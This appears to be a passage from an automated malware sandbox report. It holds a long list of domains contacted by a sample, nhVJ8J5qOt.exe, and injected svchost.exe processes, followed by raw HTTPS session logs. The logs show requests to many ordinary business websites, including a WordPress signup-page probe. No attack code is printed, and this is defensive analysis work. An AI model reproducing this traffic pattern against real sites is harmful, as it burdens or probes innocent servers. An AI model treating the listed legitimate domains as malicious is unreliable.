                                                                                                                                                                                                                                                                          • www.abdg.com
                                                                                                                                                                                                                                                                          • www.sjbs.org
                                                                                                                                                                                                                                                                          • www.xaicom.es
                                                                                                                                                                                                                                                                          • www.hummer.hu
                                                                                                                                                                                                                                                                          • www.synetik.net
                                                                                                                                                                                                                                                                          • www.aevga.com
                                                                                                                                                                                                                                                                          • www.waldi.pl
                                                                                                                                                                                                                                                                          • www.maktraxx.com
                                                                                                                                                                                                                                                                          • www.yocinc.org
                                                                                                                                                                                                                                                                          • www.holleman.us
                                                                                                                                                                                                                                                                          • www.stnic.co.uk
                                                                                                                                                                                                                                                                          • www.ora.ecnet.jp
                                                                                                                                                                                                                                                                          • www.jacomfg.com
                                                                                                                                                                                                                                                                          • www.netcr.com
                                                                                                                                                                                                                                                                          • www.jchysk.com
                                                                                                                                                                                                                                                                          • www.mobilnic.net
                                                                                                                                                                                                                                                                          • www.vitaindu.com
                                                                                                                                                                                                                                                                          • www.mqs.com.br
                                                                                                                                                                                                                                                                          • www.valselit.com
                                                                                                                                                                                                                                                                          • www.lrsuk.com
                                                                                                                                                                                                                                                                          • www.gpthink.com
                                                                                                                                                                                                                                                                          • www.2print.com
                                                                                                                                                                                                                                                                          • www.x0c.com
                                                                                                                                                                                                                                                                          • www.pupi.cz
                                                                                                                                                                                                                                                                          • www.nelipak.nl
                                                                                                                                                                                                                                                                          • www.dayvo.com
                                                                                                                                                                                                                                                                          • www.edimart.hu
                                                                                                                                                                                                                                                                          • www.kernsafe.com
                                                                                                                                                                                                                                                                          • www.pcgrate.com
                                                                                                                                                                                                                                                                          • www.stajum.com
                                                                                                                                                                                                                                                                          • www.cel-cpa.com
                                                                                                                                                                                                                                                                          • www.dgmna.com
                                                                                                                                                                                                                                                                          • www.fe-bauer.de
                                                                                                                                                                                                                                                                          • www.valdal.com
                                                                                                                                                                                                                                                                          • www.rs-ag.com
                                                                                                                                                                                                                                                                          • www.fink.com
                                                                                                                                                                                                                                                                          • www.nqks.com
                                                                                                                                                                                                                                                                          • www.elpro.si
                                                                                                                                                                                                                                                                          • www.iamdirt.com
                                                                                                                                                                                                                                                                          • www.myropcb.com
                                                                                                                                                                                                                                                                          • www.wifi4all.nl
                                                                                                                                                                                                                                                                          • www.fcwcvt.org
                                                                                                                                                                                                                                                                          • www.snugpak.com
                                                                                                                                                                                                                                                                          • www.photo4b.com
                                                                                                                                                                                                                                                                          • www.crcsi.org
                                                                                                                                                                                                                                                                          • www.koz1.net
                                                                                                                                                                                                                                                                          • www.ora-ito.com
                                                                                                                                                                                                                                                                          • www.yoruksut.com
                                                                                                                                                                                                                                                                          • www.vazir.se
                                                                                                                                                                                                                                                                          • www.t-tre.com
                                                                                                                                                                                                                                                                          • www.medius.si
                                                                                                                                                                                                                                                                          • www.cokocoko.com
                                                                                                                                                                                                                                                                          • www.ka-mo-me.com
                                                                                                                                                                                                                                                                          • www.speelhal.net
                                                                                                                                                                                                                                                                          • www.com-sit.com
                                                                                                                                                                                                                                                                          • www.findbc.com
                                                                                                                                                                                                                                                                          • www.c9dd.com
                                                                                                                                                                                                                                                                          • www.domon.com
                                                                                                                                                                                                                                                                          • www.pwd.org
                                                                                                                                                                                                                                                                          • www.tyrns.com
                                                                                                                                                                                                                                                                          • www.spanesi.com
                                                                                                                                                                                                                                                                          • www.tc17.com
                                                                                                                                                                                                                                                                          • www.railbook.net
                                                                                                                                                                                                                                                                          • www.fnsds.org
                                                                                                                                                                                                                                                                          • www.pohlfood.com
                                                                                                                                                                                                                                                                          • www.11tochi.net
                                                                                                                                                                                                                                                                          • www.pb-games.com
                                                                                                                                                                                                                                                                          • www.sclover3.com
                                                                                                                                                                                                                                                                          • www.wkhk.net
                                                                                                                                                                                                                                                                          • vvsteknik.dk
                                                                                                                                                                                                                                                                          • shanks.co.uk
                                                                                                                                                                                                                                                                          • ncn.de
                                                                                                                                                                                                                                                                          • linac.co.uk
                                                                                                                                                                                                                                                                          • bosado.com
                                                                                                                                                                                                                                                                          • beafin.com
                                                                                                                                                                                                                                                                          • mackusick.de
                                                                                                                                                                                                                                                                          • sgk.home.pl
                                                                                                                                                                                                                                                                          • top1oil.com
                                                                                                                                                                                                                                                                          • univi.it
                                                                                                                                                                                                                                                                          • ossir.org
                                                                                                                                                                                                                                                                          • ramkome.com
                                                                                                                                                                                                                                                                          • kallman.net
                                                                                                                                                                                                                                                                          • softizer.com
                                                                                                                                                                                                                                                                          • ludomemo.com
                                                                                                                                                                                                                                                                          • gbp-jp.com
                                                                                                                                                                                                                                                                          • s5w.com
                                                                                                                                                                                                                                                                          • nrsi.com
                                                                                                                                                                                                                                                                          • ftmobile.com
                                                                                                                                                                                                                                                                          • uhsa.edu.ag
                                                                                                                                                                                                                                                                          • bigzz.by
                                                                                                                                                                                                                                                                          • nettlinx.org
                                                                                                                                                                                                                                                                          • kamptal.at
                                                                                                                                                                                                                                                                          • bd-style.com
                                                                                                                                                                                                                                                                          • scintel.com
                                                                                                                                                                                                                                                                          • 78san.com
                                                                                                                                                                                                                                                                          • muhr-soehne.de
                                                                                                                                                                                                                                                                          • burstner.ru
                                                                                                                                                                                                                                                                          • hbfuels.com
                                                                                                                                                                                                                                                                          • stopllc.com
                                                                                                                                                                                                                                                                          • impexnc.com
                                                                                                                                                                                                                                                                          • dhh.la.gov
                                                                                                                                                                                                                                                                          • rtcasey.com
                                                                                                                                                                                                                                                                          • hchc.org
                                                                                                                                                                                                                                                                          • popbook.com
                                                                                                                                                                                                                                                                          • strazynski.pl
                                                                                                                                                                                                                                                                          • dayvo.com
                                                                                                                                                                                                                                                                          • insia.com
                                                                                                                                                                                                                                                                          • refintl.org
                                                                                                                                                                                                                                                                          • deckoviny.cz
                                                                                                                                                                                                                                                                          • hamaker.net
                                                                                                                                                                                                                                                                          • pers.com
                                                                                                                                                                                                                                                                          • vdoherty.com
                                                                                                                                                                                                                                                                          • noblesse.be
                                                                                                                                                                                                                                                                          • ruzee.com
                                                                                                                                                                                                                                                                          • alexpope.biz
                                                                                                                                                                                                                                                                          • zemarmot.net
                                                                                                                                                                                                                                                                          • rkengg.com
                                                                                                                                                                                                                                                                          • kustnara.com
                                                                                                                                                                                                                                                                          • smitko.net
                                                                                                                                                                                                                                                                          • yoruksut.com
                                                                                                                                                                                                                                                                          • sigtoa.com
                                                                                                                                                                                                                                                                          • biurohera.pl
                                                                                                                                                                                                                                                                          • arowines.com
                                                                                                                                                                                                                                                                          • mackusick.com
                                                                                                                                                                                                                                                                          • msl-lock.com
                                                                                                                                                                                                                                                                          • infotech.pl
                                                                                                                                                                                                                                                                          • ifesnet.com
                                                                                                                                                                                                                                                                          • rokoron.com
                                                                                                                                                                                                                                                                          • gydrozo.ru
                                                                                                                                                                                                                                                                          • calvinly.com
                                                                                                                                                                                                                                                                          • dbnet.at
                                                                                                                                                                                                                                                                          • magicomm.co.uk
                                                                                                                                                                                                                                                                          • t-mould.com
                                                                                                                                                                                                                                                                          • any-s.net
                                                                                                                                                                                                                                                                          • mcseurope.nl
                                                                                                                                                                                                                                                                          • pccj.net
                                                                                                                                                                                                                                                                          • aba.org.eg
                                                                                                                                                                                                                                                                          • lpver.com
                                                                                                                                                                                                                                                                          • sinwal.com
                                                                                                                                                                                                                                                                          • jnf.at
                                                                                                                                                                                                                                                                          • jsaps.com
                                                                                                                                                                                                                                                                          • sanfotek.net
                                                                                                                                                                                                                                                                          • roewer.de
                                                                                                                                                                                                                                                                          • midap.com
                                                                                                                                                                                                                                                                          • pellys.co.uk
                                                                                                                                                                                                                                                                          • hazmatt.com
                                                                                                                                                                                                                                                                          • cjborden.com
                                                                                                                                                                                                                                                                          • notis.ru
                                                                                                                                                                                                                                                                          • fortknox.bm
                                                                                                                                                                                                                                                                          • zupraha.cz
                                                                                                                                                                                                                                                                          • isom.org
                                                                                                                                                                                                                                                                          • angework.com
                                                                                                                                                                                                                                                                          • icd-host.com
                                                                                                                                                                                                                                                                          • bidroll.com
                                                                                                                                                                                                                                                                          • revoldia.net
                                                                                                                                                                                                                                                                          • coxkitchensandbaths.com
                                                                                                                                                                                                                                                                          • indonesiamedia.com
                                                                                                                                                                                                                                                                          • atb-lit.com
                                                                                                                                                                                                                                                                          • htsmx.net
                                                                                                                                                                                                                                                                          • envogen.com
                                                                                                                                                                                                                                                                          • touchfam.ca
                                                                                                                                                                                                                                                                          • scip.org.uk
                                                                                                                                                                                                                                                                          • gcss.com
                                                                                                                                                                                                                                                                          • orbitgas.com
                                                                                                                                                                                                                                                                          • apcotex.com
                                                                                                                                                                                                                                                                          • daytonir.com
                                                                                                                                                                                                                                                                          • websy.com
                                                                                                                                                                                                                                                                          • ccssinc.com
                                                                                                                                                                                                                                                                          • nettle.pl
                                                                                                                                                                                                                                                                          • dzm.cz
                                                                                                                                                                                                                                                                          • karmy.com.pl
                                                                                                                                                                                                                                                                          • epc.com.au
                                                                                                                                                                                                                                                                          • cutchie.com
                                                                                                                                                                                                                                                                          • floopis.com
                                                                                                                                                                                                                                                                          • pcoyuncu.com
                                                                                                                                                                                                                                                                          • valselit.com
                                                                                                                                                                                                                                                                          • web-york.com
                                                                                                                                                                                                                                                                          • shittas.com
                                                                                                                                                                                                                                                                          • shesfit.com
                                                                                                                                                                                                                                                                          • paraski.org
                                                                                                                                                                                                                                                                          • onzcda.com
                                                                                                                                                                                                                                                                          • rappich.de
                                                                                                                                                                                                                                                                          • wnit.org
                                                                                                                                                                                                                                                                          • mondopp.net
                                                                                                                                                                                                                                                                          • kayoaiba.com
                                                                                                                                                                                                                                                                          • com-edit.fr
                                                                                                                                                                                                                                                                          • themark.org
                                                                                                                                                                                                                                                                          • portoccd.org
                                                                                                                                                                                                                                                                          • uster.com
                                                                                                                                                                                                                                                                          • dyag-eng.com
                                                                                                                                                                                                                                                                          • fogra.com.pl
                                                                                                                                                                                                                                                                          • plaske.ua
                                                                                                                                                                                                                                                                          • amerifor.com
                                                                                                                                                                                                                                                                          • dog-jog.net
                                                                                                                                                                                                                                                                          • k-nikko.com
                                                                                                                                                                                                                                                                          • x96.com
                                                                                                                                                                                                                                                                          • koz1.net
                                                                                                                                                                                                                                                                          • cbras.com
                                                                                                                                                                                                                                                                          • vfcindia.com
                                                                                                                                                                                                                                                                          • sjbmw.com
                                                                                                                                                                                                                                                                          • webways.com
                                                                                                                                                                                                                                                                          • listel.co.jp
                                                                                                                                                                                                                                                                          • holp-ai.com
                                                                                                                                                                                                                                                                          • likangds.com
                                                                                                                                                                                                                                                                          • e-kami.net
                                                                                                                                                                                                                                                                          • webavant.com
                                                                                                                                                                                                                                                                          • banvari.com
                                                                                                                                                                                                                                                                          • kewlmail.com
                                                                                                                                                                                                                                                                          • nlcv.bas.bg
                                                                                                                                                                                                                                                                          • tbvlugus.nl
                                                                                                                                                                                                                                                                          • gbmfg.com
                                                                                                                                                                                                                                                                          • karila.fr
                                                                                                                                                                                                                                                                          • lyto.net
                                                                                                                                                                                                                                                                          • shztm.ru
                                                                                                                                                                                                                                                                          • riwn.org
                                                                                                                                                                                                                                                                          • bossinst.com
                                                                                                                                                                                                                                                                          • fifa-ews.com
                                                                                                                                                                                                                                                                          • peminet.net
                                                                                                                                                                                                                                                                          • wvs-net.de
                                                                                                                                                                                                                                                                          • hubbikes.com
                                                                                                                                                                                                                                                                          • geecl.com
                                                                                                                                                                                                                                                                          • captlfix.com
                                                                                                                                                                                                                                                                          • camamat.com
                                                                                                                                                                                                                                                                          • mikihan.com
                                                                                                                                                                                                                                                                          • cpmteam.com
                                                                                                                                                                                                                                                                          • aluminox.es
                                                                                                                                                                                                                                                                          • oozkranj.com
                                                                                                                                                                                                                                                                          • agulatex.com
                                                                                                                                                                                                                                                                          • leapc.com
                                                                                                                                                                                                                                                                          • mijash3.com
                                                                                                                                                                                                                                                                          • ssm.ch
                                                                                                                                                                                                                                                                          • vivastay.com
                                                                                                                                                                                                                                                                          • shiner.com
                                                                                                                                                                                                                                                                          • aiolos-sa.gr
                                                                                                                                                                                                                                                                          • dspears.com
                                                                                                                                                                                                                                                                          • bount.com.tw
                                                                                                                                                                                                                                                                          • araax.com
                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          0192.168.2.650101185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: techtrans.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC0INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:06 GMT
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC0INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                          Data Ascii: 2c2<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          1192.168.2.6501515.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC1OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC1INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:06 GMT
                                                                                                                                                                                                                                                                          Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 30 Jun 2023 05:41:10 GMT
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Content-Length: 53069
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC1INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC17INData Raw: 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 73 73 74 65 63 68 6e 69 6b 2f 76 65 72 73 63 68 6c 69 65 73 73 6d 61 73 63 68 69 6e 65 6e 22 20 74 69 74 6c 65 3d 22 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                          Data Ascii: item layout-0 "> <a href="/verschliesstechnik/verschliessmaschinen" title="Verschliemaschinen"> Verschliemaschinen </a>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC33INData Raw: 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 6c 61 6e 64 73 63 61 70 65 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: r.jpg"><source media="(max-width: 767px) and (orientation:landscape)" srcset="/fileadmin/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/file
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC49INData Raw: 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64
                                                                                                                                                                                                                                                                          Data Ascii: srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          10192.168.2.65026194.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:09 UTC213OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: www.diamir.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:09 UTC225INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:09 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                          2023-07-05 06:07:09 UTC226INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          100192.168.2.615646188.114.96.7443C:\Users\user\Desktop\nhVJ8J5qOt.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17146OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: hyab.se
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17148INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:08:00 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Location: https://hyab.com
                                                                                                                                                                                                                                                                          Cache-Control: max-age=600
                                                                                                                                                                                                                                                                          Expires: Wed, 05 Jul 2023 06:18:00 GMT
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6Gbx1%2Bo%2FC6fdwNkS7lFXALSO56RxR3WbXGnE4EG8tMMpEmax%2FpybEt9K%2FKUuJyGnqGMHPLqHeehH9QFjSUsDpEIS%2F%2BclWKe1b6lEYQcDuTq3JiyKF2yDHb33"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6e511bb01ca3-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17148INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17148INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          101192.168.2.61572583.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17149OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: dataform.co.uk
                                                                                                                                                                                                                                                                          2023-07-05 06:08:01 UTC17272INHTTP/1.1 200 OK
